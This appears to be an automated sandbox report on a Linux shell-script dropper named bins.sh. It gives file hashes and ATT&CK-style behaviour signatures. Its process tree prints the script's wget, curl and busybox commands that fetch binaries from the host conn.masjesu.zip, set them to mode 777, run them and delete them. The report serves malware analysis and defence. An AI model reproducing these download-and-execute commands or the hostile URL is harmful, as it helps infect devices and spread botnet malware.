Analysis

  • max time kernel
    149s
  • max time network
    11s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    10/12/2024, 12:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    76332caef0ad924adea8ad2d888817f1

  • SHA1

    a8474f314af7375aabfa4b9c94d039e27c8a4f87

  • SHA256

    5ba18bcbe3809ddafbbc1b1452b28070c84795f6254dcb2f4774942326290c2b

  • SHA512

    32bc8f9f68837d308bb57cca1de47d44b286fcff7835c439992400e7455f5a79afbb3be407a9166a65bc6a1ae1a654dd6fd59c0b2e68c67ceb2e4710a7742952

  • SSDEEP

    192:Hl4Akbp1TV77YpFUx3MI+4p1977YpFS3MIRfK:Hl4Akbp1TV77YpFUx3MI+4p1977YpFSW

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:647
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:651
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
        • System Network Configuration Discovery
        PID:655
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:662
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
        • System Network Configuration Discovery
        PID:679
    • /bin/chmod
      chmod 777 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
        • File and Directory Permissions Modification
        PID:680
    • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      ./3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
        • Executes dropped EXE
        PID:682
    • /bin/rm
      rm 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
        PID:684
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
        • System Network Configuration Discovery
        PID:685
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:686

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v

    Filesize

    151KB

    MD5

    6c583043d91c55aa470c08c87058e917

    SHA1

    abf65a5b9bba69980278ad09356e53de8bb89439

    SHA256

    2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

    SHA512

    82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5